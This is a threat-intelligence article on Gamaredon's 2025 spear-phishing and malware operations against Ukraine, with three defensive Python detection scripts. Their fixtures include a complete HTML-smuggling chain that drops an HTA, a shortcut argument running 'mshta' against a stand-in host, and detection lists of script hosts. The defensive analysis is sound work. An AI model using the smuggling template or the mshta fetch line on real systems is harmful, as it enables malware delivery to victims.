The Russian state-sponsored group Gamaredon significantly escalated its cyber operations against Ukraine throughout 2025, introducing new malware and abusing legitimate cloud and web services to support its attacks. The escalation underscores the group’s persistent focus on Ukrainian governmental and military institutions.
In 2025, Gamaredon orchestrated 35 distinct spear-phishing campaigns targeting new entities, with a concentration in the latter half of the year. These campaigns primarily aimed at Ukrainian government and military bodies, seeking to exfiltrate sensitive information to support Russian interests in the ongoing conflict.
The spear-phishing lures were archive attachments and XHTML files that used HTML smuggling to assemble the payload inside the victim’s browser. Both delivered malicious HTA downloaders such as PteroSand, which in turn fetched additional payloads. Some attacks also exploited a now-patched path traversal vulnerability in WinRAR (CVE-2025-8088) to drop these downloaders directly into the victim’s Windows Startup folder, so that they executed at the next logon and gave the group persistence on the compromised system.
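A defender’s first question on seeing an XHTML lure is whether it smuggles a file. The script below is an added example, not code from the original article or from any vendor report on PteroSand: it decodes every long base64 run in a page, checks the decoded bytes for HTA and script-host markers, and reports the filename the page would drop. The XHTML and the inert decoy HTA embedded in it are constructed here for the demonstration; the marker lists are assumptions, and real lures often XOR, chunk or reverse the blob, which this plain-base64 check will not catch.

```python
import base64
import re

# Constructed, inert decoy standing in for an HTA downloader body: no network, no file write.
_DECOY_HTA = b"""<html><head><hta:application id="app" windowstate="minimize"/></head>
<script language="VBScript">
Set sh = CreateObject("WScript.Shell")
WScript.Echo "decoy"
</script></html>"""

# Constructed XHTML lure showing the usual smuggling chain:
# atob -> Uint8Array -> Blob -> blob: URL -> anchor with a download attribute -> click().
SAMPLE_XHTML = """<?xml version="1.0" encoding="UTF-8"?>
<html xmlns="http://www.w3.org/1999/xhtml"><body>
<p>Loading document, please wait...</p>
<script type="text/javascript">
var b = atob("__B64__");
var a = new Uint8Array(b.length);
for (var i = 0; i < b.length; i++) { a[i] = b.charCodeAt(i); }
var blob = new Blob([a], {type: "application/octet-stream"});
var l = document.createElement("a");
l.href = window.URL.createObjectURL(blob);
l.download = "Report.hta";
l.click();
</script></body></html>""".replace("__B64__", base64.b64encode(_DECOY_HTA).decode())

# JavaScript fragments that together assemble a file on the client (assumed list).
SMUGGLING_MARKERS = ("atob(", "new Blob", "createObjectURL", "msSaveOrOpenBlob", ".download")
# Byte patterns that mark a decoded blob as an HTA / script-host payload (assumed list).
PAYLOAD_MARKERS = (b"<hta:application", b"<script", b"wscript.shell", b"createobject(", b"mshta")
B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def decode_blobs(text):
    """Return every long base64 run in the page that decodes cleanly."""
    blobs = []
    for m in B64_RE.finditer(text):
        try:
            blobs.append(base64.b64decode(m.group(0), validate=True))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return blobs


def payload_indicators(data):
    """Case-insensitive marker hits inside one decoded blob."""
    low = data.lower()
    return [p.decode() for p in PAYLOAD_MARKERS if p in low]


def dropped_filename(text):
    """Name assigned via the anchor's download attribute, if any."""
    m = re.search(r"""\.download\s*=\s*["']([^"']+)["']""", text)
    return m.group(1) if m else None


def scan_html(text):
    markers = [m for m in SMUGGLING_MARKERS if m in text]
    hits = [ind for ind in (payload_indicators(b) for b in decode_blobs(text)) if ind]
    return {
        "smuggling_markers": markers,
        "dropped_name": dropped_filename(text),
        "payload_indicators": hits,
        # two assembly primitives plus a script-looking blob is a strong signal
        "suspicious": len(markers) >= 2 and bool(hits),
    }


if __name__ == "__main__":
    print(scan_html(SAMPLE_XHTML))
```

Run it against a quarantined attachment with `scan_html(open(path, encoding="utf-8", errors="replace").read())`; a hit on `dropped_name` ending in `.hta`, `.lnk` or an archive extension is the cue to pull the decoded blob into a sandbox rather than opening the page.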
To facilitate lateral movement within networks, Gamaredon utilized tools like PteroLNK and PteroPaste. These weaponizers infected USB and network drives with malicious LNK files. When unsuspecting users opened these files, they triggered the retrieval and execution of downloader malware, further propagating the infection.
Additionally, the group employed PteroSetup, an older VBScript weaponizer first detected in January 2021. This tool scanned USB and network drives for legitimate installer files, replacing them with 7z self-extracting archives containing both the original installer and a malicious VBScript downloader. This approach allowed Gamaredon to maintain a foothold within compromised environments.
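The two drive-weaponization behaviours described above (PteroLNK/PteroPaste planting LNK files, PteroSetup swapping installers for 7z self-extracting archives) leave artefacts that can be triaged offline. The script below is an added example written for this article, not a tool from the original page or from any vendor: it walks a mounted drive, flags `.lnk` files whose bytes reference a script host in ASCII or UTF-16LE, and flags `.exe` files that are a PE stub with an embedded 7z container. The sample drive it builds is constructed in a temp directory, and its `.lnk` files are minimal headers with trailing UTF-16 text rather than spec-complete shortcuts; the script-host list is an assumption. Legitimate software is sometimes shipped as a 7z SFX, so an SFX hit is a lead to compare against the vendor’s hash, not a conviction.

```python
import os
import tempfile

# Fixed 20-byte prefix of every Shell Link (.lnk): HeaderSize 0x4C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046 in its little-endian on-disk form.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c0000000" "00000046")
# 7z container signature; a 7z SFX is a PE stub with this container appended.
SEVENZ_SIG = b"7z\xbc\xaf\x27\x1c"
# Hosts a document shortcut on a USB stick has no business launching (assumed list).
SCRIPT_HOSTS = ("mshta", "powershell", "pwsh", "wscript", "cscript", "rundll32", "cmd.exe /c")


def lnk_script_hosts(data):
    """Script hosts referenced anywhere in the shortcut, ASCII or UTF-16LE
    (LNK StringData such as Arguments is normally UTF-16LE)."""
    if not data.startswith(LNK_MAGIC):
        return []
    low = data.lower()  # ASCII-only lowercasing leaves the UTF-16 NUL bytes intact
    return [h for h in SCRIPT_HOSTS
            if h.encode("ascii") in low or h.encode("utf-16-le") in low]


def is_7z_sfx(data):
    """PE stub followed by a 7z container somewhere in the image."""
    return data[:2] == b"MZ" and SEVENZ_SIG in data


def triage_drive(root):
    """Return sorted (relative path, finding, details) tuples for the whole tree."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            rel = os.path.relpath(path, root)
            low = name.lower()
            if low.endswith(".lnk"):
                hosts = lnk_script_hosts(data)
                if hosts:
                    findings.append((rel, "lnk-launches-script-host", hosts))
            elif low.endswith(".exe") and is_7z_sfx(data):
                findings.append((rel, "exe-is-7z-sfx", []))
    return sorted(findings)


def build_sample_drive():
    """Constructed stand-in for a USB drive (temp dir); files are minimal fixtures."""
    root = tempfile.mkdtemp(prefix="usb_triage_")
    os.makedirs(os.path.join(root, "Documents"))
    header = LNK_MAGIC + b"\x00" * 56  # pad out the 76-byte ShellLinkHeader
    files = {
        # lure shortcut: double extension plus an argument string naming mshta
        "Documents/Report.docx.lnk": header + "mshta.exe https://example.invalid/a.hta".encode("utf-16-le"),
        # benign shortcut pointing at a document
        "Documents/Notes.lnk": header + "C:\\Users\\me\\notes.txt".encode("utf-16-le"),
        # installer replaced by a 7z SFX (the PteroSetup pattern)
        "Setup.exe": b"MZ" + b"\x90" * 256 + SEVENZ_SIG + b"\x00" * 64,
        # ordinary PE with no embedded archive
        "tool.exe": b"MZ" + b"\x00" * 256,
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for finding in triage_drive(build_sample_drive()):
        print(finding)
```

Point `triage_drive()` at the mount point of a suspect stick or a mapped share; because it reads whole files, run it over an image or a read-only mount rather than the live device so that nothing on the drive is executed or modified.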
Throughout 2025, Gamaredon increasingly relied on third-party services to obscure their operations. They utilized tunnel services and serverless worker platforms to conceal their backend infrastructure, making detection and mitigation more challenging for defenders.
The group’s malware arsenal expanded with the introduction of six new malicious PowerShell tools:
- PteroDee and PteroCache: Fetch and execute PowerShell payloads in memory.
- PteroDum: Fetch and execute VBScript payloads in memory.
- PteroOdd: Retrieves a single PowerShell payload via the Telegra.ph API; this tool was likely operated in collaboration with the Turla group.
- PteroEffigy: Obtain command-and-control server details via the GoFile cloud storage service.
- PteroPaste: Weaponize USB drives and download additional PowerShell payloads through an encrypted channel.
These developments highlight Gamaredon’s adaptability and its commitment to expanding its capabilities. The group’s activity also tracked major Russian and Crimean public holidays, dropping off on those days, which suggests that its operators are government-affiliated employees.
Another notable aspect of Gamaredon’s strategy is the abuse of legitimate online services, both for data exfiltration and as dead drop resolvers, that is, public pages the malware reads to learn the current command-and-control address. Services including Telegra.ph, Teletype, Rentry.co, Write.as, Dropbox, GoFile, DEV Community (dev.to), Mastodon, Lesma, Nopaste.net, Paste.ee, Wasabi, Tebi and Intercolo have been used to obscure operations and make the infrastructure more resilient, since defenders can rarely block these services outright.
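Because these services cannot simply be blocked, the practical detection is contextual: which process on which host is talking to them, and how much it sends. The script below is an added example for this article, not code from the original page or from any vendor tooling. It reads proxy-style log lines, flags script hosts (PowerShell, mshta, wscript, cscript) that resolve a listed service, and separates large POSTs (possible exfiltration) from small GETs (possible dead-drop resolution). The log format and every log line are constructed for the example; the domain set is an assumption limited to services from the list above whose domains the author of this example is sure of (Mastodon instances, Lesma, Tebi and Intercolo are omitted and should be added per environment), and the size threshold is a starting point, not a tuned value.

```python
# Domains for services named in the article as dead-drop / exfil channels (assumed set,
# deliberately incomplete: extend it with the instances and endpoints you actually see).
PUBLIC_SERVICE_DOMAINS = {
    "telegra.ph", "teletype.in", "rentry.co", "write.as",
    "dropbox.com", "dropboxapi.com", "gofile.io", "dev.to",
    "paste.ee", "nopaste.net", "wasabisys.com",
}
# Script hosts that Gamaredon's PowerShell and VBScript tooling runs under (assumed set).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Constructed proxy lines: timestamp host process dest_host method path bytes_sent
SAMPLE_LOG = """\
2025-09-03T08:12:41Z WS-0142 powershell.exe api.telegra.ph GET /page/x 412
2025-09-03T08:13:05Z WS-0142 mshta.exe store1.gofile.io POST /upload 1048576
2025-09-03T08:15:00Z WS-0077 chrome.exe www.dropbox.com GET /home 2200
2025-09-03T08:16:22Z WS-0077 outlook.exe outlook.office365.com POST /api 9000
2025-09-03T08:17:09Z WS-0142 powershell.exe api.telegra.ph GET /page/x 412
"""


def parse_line(line):
    ts, host, proc, dst, method, path, sent = line.split()
    return {"ts": ts, "host": host, "proc": proc.lower(), "dst": dst.lower(),
            "method": method.upper(), "path": path, "sent": int(sent)}


def public_service(dst):
    """Suffix match so that api.telegra.ph and telegra.ph both resolve to the same service."""
    for d in PUBLIC_SERVICE_DOMAINS:
        if dst == d or dst.endswith("." + d):
            return d
    return None


def analyze(log_text, exfil_bytes=256 * 1024):
    """One alert per script-host request to a listed service; everything else is ignored."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        e = parse_line(line)
        svc = public_service(e["dst"])
        if svc is None or e["proc"] not in SCRIPT_HOSTS:
            continue  # browsers and mail clients use these services legitimately
        if e["method"] == "POST" and e["sent"] >= exfil_bytes:
            reason = "possible-exfil"
        else:
            reason = "possible-dead-drop-resolve"
        alerts.append({"ts": e["ts"], "host": e["host"], "proc": e["proc"],
                       "service": svc, "reason": reason})
    return alerts


def summarize(alerts):
    """Collapse alerts per (host, process, service, reason) with a count for triage."""
    counts = {}
    for a in alerts:
        key = (a["host"], a["proc"], a["service"], a["reason"])
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for key, n in sorted(summarize(analyze(SAMPLE_LOG)).items()):
        print(n, *key)
```

Repeated small GETs from the same script host to the same page, as in the first and last sample lines, are the dead-drop polling pattern worth escalating even when each request looks harmless on its own.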
Gamaredon’s persistent evolution and creative abuse of legitimate services underscore the difficulty of defending against state-sponsored threats, and its ability to fold new tools and techniques into operations quickly makes it a formidable adversary. The specifics above do suggest concrete controls: keep WinRAR patched, restrict mshta.exe and the script hosts on endpoints that do not need them, treat LNK and executable files arriving on removable and network drives as untrusted, and monitor outbound traffic from script hosts to paste, blog and cloud-storage services. As the cyber conflict between Russia and Ukraine continues, organizations in scope should expect further iterations of these techniques and stay informed about them.